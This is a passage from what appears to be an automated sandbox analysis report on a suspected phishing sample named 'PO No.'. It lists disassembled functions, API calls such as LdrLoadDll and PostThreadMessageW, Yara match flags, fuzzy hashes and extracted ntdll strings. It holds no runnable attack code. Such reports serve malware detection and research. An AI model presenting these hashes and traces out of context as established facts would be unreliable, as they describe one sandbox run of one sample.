129->135 130->120 133->127 138 b98f02-b98f05 133->138 139 b98f23-b98f26 134->139 135->120 138->127 142 b98f07 138->142 145 b98f28-b98f2b 139->145 146 b98f4f-b98f53 139->146 142->127 150 b98ea0-b98ebc call b950a3 143->150 144->150 145->146 151 b98f2d-b98f2f 145->151 146->118 146->139 152 b98fda-b98fec call babf13 148->152 153 b98fb0-b98fc1 call b87133 148->153 149->152 155 b98fd4 149->155 150->104 151->146 156 b98f31-b98f34 151->156 163 b98ff3-b99008 call b9b843 152->163 161 b98fc6-b98fcb 153->161 155->152 156->146 160 b98f36-b98f4c 156->160 160->146 161->149 161->163 166 b9900a-b99036 call b97ba3 * 2 call bacf03 163->166 172 b9903b-b9903e 166->172 172->66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                          • Associated: 00000000.00000002.2513720843.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b80000_PO No.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$"
                                                          • API String ID: 0-3758156766
                                                          • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                          • Instruction ID: 652512f351713115d8b20a7bf759aec3f0fde028e70813a601d42d2d35804b1d
                                                          • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                          • Instruction Fuzzy Hash: D1F17DB1D0421AAFDF24DB64CC85BAEB7F9EF45300F1485E9E519A7241EB309E45CBA0
                                                          Function 00B97CA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 261 b97ca3-b97ccc call baf7e3 264 b97cce-b97cd1 261->264 265 b97cd2-b97ce0 call bafde3 261->265 268 b97cf0-b97d01 call bae283 265->268 269 b97ce2-b97ced call bb0083 265->269 274 b97d1a-b97d1d 268->274 275 b97d03-b97d17 LdrLoadDll 268->275 269->268 275->274
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00B97D15
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                          • Associated: 00000000.00000002.2513720843.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b80000_PO No.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                          • Instruction ID: 73b4758eeba727504fa837115fbc18e6fe144714ba3a1b52947bb183bbf4efc4
                                                          • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                          • Instruction Fuzzy Hash: E00100B5D5420DA7DF10DAE4DC42FEDB7B8EB54304F1441A5A90897140FA71EA548B91
                                                          Function 00BACB43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 286 bacb43-bacb7f call b84903 call badd73 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00BACB7A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                          • Associated: 00000000.00000002.2513720843.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b80000_PO No.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                          • Instruction ID: 77993a6156921bcd40b8909e357437282f20a3063f90d3ee0791fd53ce1a7c43
                                                          • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                          • Instruction Fuzzy Hash: A1E04672204244BBD220EA5ADC02F9BB7ACDFC5710F008595FA5DA7242C770B91187E0
                                                          Function 01582B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 300 1582b60-1582b6c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 65b415aab7c2bf7707b1e0ad67c6c16991fec1d72c4f93c1c66dae2320be152d
                                                          • Instruction ID: 77aaca71c07c2ec06baa79c4a955283bb0a4d4a2b0531fb24031a1376af0f691
                                                          • Opcode Fuzzy Hash: 65b415aab7c2bf7707b1e0ad67c6c16991fec1d72c4f93c1c66dae2320be152d
                                                          • Instruction Fuzzy Hash: E090026120240403460571584414616404AA7E1211B59C421E1018990DC5698991622A
                                                          Function 01582DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 302 1582df0-1582dfc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 888adcb7d2f32070792ced919f9465ac858e2d0e4a8a15439247ded0e1105206
                                                          • Instruction ID: 14c211cdd0e54df4609b729290b32e59c6985d1c28dc11189a45db6fdc258ef3
                                                          • Opcode Fuzzy Hash: 888adcb7d2f32070792ced919f9465ac858e2d0e4a8a15439247ded0e1105206
                                                          • Instruction Fuzzy Hash: 6190023120140813D611715845047070049A7D1251F99C812A0428958DD69A8A52A226
                                                          Function 01582C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 301 1582c70-1582c7c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5777cfa3ee9d019639b99118aab6af48e876c1744415806dfd78a396e50e7bf2
                                                          • Instruction ID: 9631fd48d94e3fb3149e86bb8db8b9b88721f7db48a5756e0878060c203b2038
                                                          • Opcode Fuzzy Hash: 5777cfa3ee9d019639b99118aab6af48e876c1744415806dfd78a396e50e7bf2
                                                          • Instruction Fuzzy Hash: E290023120148C02D6107158840474A0045A7D1311F5DC811A4428A58DC6D989917226
                                                          Function 015835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9b9a8cb96f18cc93c3679b70268c9107fbb37fb0aa87e442b0f8b174caa3bf79
                                                          • Instruction ID: 113fe7113e44149963bc014ce1ef54f2e7828f48b6c86a32aec37e6ca98c7992
                                                          • Opcode Fuzzy Hash: 9b9a8cb96f18cc93c3679b70268c9107fbb37fb0aa87e442b0f8b174caa3bf79
                                                          • Instruction Fuzzy Hash: AF90023160550802D600715845147061045A7D1211F69C811A0428968DC7D98A5166A7
                                                          Function 00B944C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00B9456A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                          • Associated: 00000000.00000002.2513720843.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b80000_PO No.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 17O3k-2I$17O3k-2I
                                                          • API String ID: 1836367815-2455829943
                                                          • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                          • Instruction ID: c5add1177d4ba8f10232c96312e27d77a707014fd681b62a684482152b5628a8
                                                          • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                          • Instruction Fuzzy Hash: 7611C4B2D441497ADB11DBE08C81EEE7FBCEF41754F4580E9F954AB201D7348A468BA1
                                                          Function 00B944F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00B9456A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                          • Associated: 00000000.00000002.2513720843.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b80000_PO No.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 17O3k-2I$17O3k-2I
                                                          • API String ID: 1836367815-2455829943
                                                          • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                          • Instruction ID: a29aaf6bf4034765ff14696bd5093810b242c3568c6b66ab18084ce694693460
                                                          • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                          • Instruction Fuzzy Hash: 900192B2D4424CBADB10ABE58C82DEF7BBCDF41794F0580B5FA14A7141E6649E078BA1
                                                          Function 00BACEB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 281 baceb3-bacef4 call b84903 call badd73 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00018623,00000007,00000000,00000004,00000000,00B97514,000000F4), ref: 00BACEEF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                          • Associated: 00000000.00000002.2513720843.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b80000_PO No.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                          • Instruction ID: 137c054ad4632417ce0c2cc9c94e62068546886be4fb70b32eb1e32e0112dab6
                                                          • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                          • Instruction Fuzzy Hash: 50E06DB1604204BBD620EE59EC41F9B37ACEFC9710F004059F918A7242C771B9118BB4
                                                          Function 00BACE63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 276 bace63-bacea7 call b84903 call badd73 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,00B9EA4E,?,?,00000000,?,00B9EA4E,?,?,?), ref: 00BACEA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                          • Associated: 00000000.00000002.2513720843.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b80000_PO No.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                          • Instruction ID: 80df46e65f9fd8d68d1f7b9be2d03c44f7411881ca87072798d58f6c68690c34
                                                          • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                          • Instruction Fuzzy Hash: EBE06DB2214244BBD614EE59DC42EAB77ACEF89710F004059FA18A7242C770B910C7B4
                                                          Function 00BACF03 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 291 bacf03-bacf38 call b84903 call badd73 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 00BACF33
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                          • Associated: 00000000.00000002.2513720843.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b80000_PO No.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                          • Instruction ID: c755f84ca5822ece6c29e14f18b6d139e219c24022ef6f88f0e2afe22a14b463
                                                          • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                          • Instruction Fuzzy Hash: F2E08C322006147BC220FA5ADC01F9B77ACDFC5710F1080A6FA08A7286D7B0B9108BF4
                                                          Function 01582C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 296 1582c0a-1582c0f 297 1582c1f-1582c26 LdrInitializeThunk 296->297 298 1582c11-1582c18 296->298
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 97ddbbbf7cbb82cc6fbb0416d13531a697a59c4ecae609498bdc17a41b745120
                                                          • Instruction ID: 683470368e6edcbc245cf83cdd99651d7252f444e6bf027d9a52abd57f40609c
                                                          • Opcode Fuzzy Hash: 97ddbbbf7cbb82cc6fbb0416d13531a697a59c4ecae609498bdc17a41b745120
                                                          • Instruction Fuzzy Hash: C4B09B719015C5D5DF11F764460871B7D4077D1711F19C461D2034A45F477CC1D1E276

                                                          Non-executed Functions

                                                          Function 015C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          • Opcode ID: 0e777c1f56488bdce2df5c81879cb27eaa780df8a0f75bd0dc9bbd452aff9d15
                                                          • Instruction ID: c02af99035705838c35e4ec5d15c6c879d550b8ca71524174639f2f9820823c1
                                                          • Opcode Fuzzy Hash: 0e777c1f56488bdce2df5c81879cb27eaa780df8a0f75bd0dc9bbd452aff9d15
                                                          • Instruction Fuzzy Hash: 80928075608342AFE721DF69C880B6BBBE8BB84B54F04491DFA94DF250D770E844CB92
                                                          Function 015368B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim user DLL$LdrpGetShimuserInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_Initializeuser$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-3089669407
                                                          • Opcode ID: 0705f2ef7ad0485b59576f8ff3de47fb7b3f45f9a92ff63967dfee26ebc6abe7
                                                          • Instruction ID: 41e4a2cf2689f689cbce13b6da65530135b3aa4cbfac2f10cc03a4905a4a7d1f
                                                          • Opcode Fuzzy Hash: 0705f2ef7ad0485b59576f8ff3de47fb7b3f45f9a92ff63967dfee26ebc6abe7
                                                          • Instruction Fuzzy Hash: 1E8161B3D0120ABFDB11EAD4DDD4EEE77BEBB447107545426B901FB100E220DE158BA1
                                                          Function 015E5910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • @, xrefs: 015E6027
                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015E5FE1
                                                          • PreferredUILanguages, xrefs: 015E63D1
                                                          • LanguageConfigurationPending, xrefs: 015E6221
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015E635D
                                                          • @, xrefs: 015E61B0
                                                          • InstallLanguageFallback, xrefs: 015E6050
                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 015E5A84
                                                          • @, xrefs: 015E647A
                                                          • Control Panel\Desktop, xrefs: 015E615E
                                                          • @, xrefs: 015E6277
                                                          • @, xrefs: 015E63A0
                                                          • PreferredUILanguagesPending, xrefs: 015E61D2
                                                          • LanguageConfiguration, xrefs: 015E6420
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                          • API String ID: 0-1325123933
                                                          • Opcode ID: 03da1f890facb6cefcff1890478fd566cee67a20ec7218ab21ee20d43f9c97a3
                                                          • Instruction ID: a7bd08e4c88ae6728eb7f5e7fde33bf10ecea8e1ccd46f4fff2788266ffa8b34
                                                          • Opcode Fuzzy Hash: 03da1f890facb6cefcff1890478fd566cee67a20ec7218ab21ee20d43f9c97a3
                                                          • Instruction Fuzzy Hash: 127269759183429FD329DF28C844AAFBBE9BBD8744F44492EFA85DB250E730D805CB52
                                                          Function 01578620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B54CE
                                                          • Thread identifier, xrefs: 015B553A
                                                          • undeleted critical section in freed memory, xrefs: 015B542B
                                                          • Invalid debug info address of this critical section, xrefs: 015B54B6
                                                          • Critical section address, xrefs: 015B5425, 015B54BC, 015B5534
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B540A, 015B5496, 015B5519
                                                          • double initialized or corrupted critical section, xrefs: 015B5508
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B54E2
                                                          • Critical section address., xrefs: 015B5502
                                                          • Critical section debug info address, xrefs: 015B541F, 015B552E
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 015B5543
                                                          • 8, xrefs: 015B52E3
                                                          • corrupted critical section, xrefs: 015B54C2
                                                          • Address of the debug info found in the active list., xrefs: 015B54AE, 015B54FA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 263d72fe5743ceaaf853c36a799c40a87e546fd2190aafb4c601f656eb34ffa7
                                                          • Instruction ID: 3b9ea9c8648bf676ae2738564aa8be47b4317073a56d310f41212c8086d934d6
                                                          • Opcode Fuzzy Hash: 263d72fe5743ceaaf853c36a799c40a87e546fd2190aafb4c601f656eb34ffa7
                                                          • Instruction Fuzzy Hash: E381ADB1A01359AFEB24CF99CC85BAEBBF5FB49714F104119F504BB290E3B5A940CB90
                                                          Function 015729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015B22E4
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015B25EB
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015B2624
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015B2506
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 015B261F
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015B24C0
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015B2602
                                                          • @, xrefs: 015B259B
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015B2412
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015B2498
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015B2409
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          • Opcode ID: 4841cd7129e8724191fdeed8fd5b8398c5f94b484b3b9404b9a5a9370f389d03
                                                          • Instruction ID: 54729408b268a120405555b95b007dfe0373928e5d8fd0380799b0df2f62dd55
                                                          • Opcode Fuzzy Hash: 4841cd7129e8724191fdeed8fd5b8398c5f94b484b3b9404b9a5a9370f389d03
                                                          • Instruction Fuzzy Hash: 5B026FB1D002299FDB21DB54CC81BEDB7B8BB54704F4045DAE649AB241EB31AF84CF69
                                                          Function 01570F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                          • API String ID: 0-360209818
                                                          • Opcode ID: 55b6017fed3733955905d50b0e74732e65e5f1b9896cf973a19ba8661df701e1
                                                          • Instruction ID: 5ca836c1d4862022c85dadc1c8831a42a505518300d435cb033a34b1830cf891
                                                          • Opcode Fuzzy Hash: 55b6017fed3733955905d50b0e74732e65e5f1b9896cf973a19ba8661df701e1
                                                          • Instruction Fuzzy Hash: 4D62AEB5A006298FDB60CF18D8D17EDB7B6BF85310F5482DAE549AF240D7325AA1CF40
                                                          Function 015E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: 84ad9a72d1811b0f733f6dee4e43164362f04e8ee9d8205ad93b9468f222c0cd
                                                          • Instruction ID: dbd80f90dbc45ef7f71252cc2614591a46ae11c9633db984d3498253a0b572fc
                                                          • Opcode Fuzzy Hash: 84ad9a72d1811b0f733f6dee4e43164362f04e8ee9d8205ad93b9468f222c0cd
                                                          • Instruction Fuzzy Hash: F951BF719043129BD32ADF18C948BABBBE8FF99640F14491DA9998F244E770D608C792
                                                          Function 015F12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
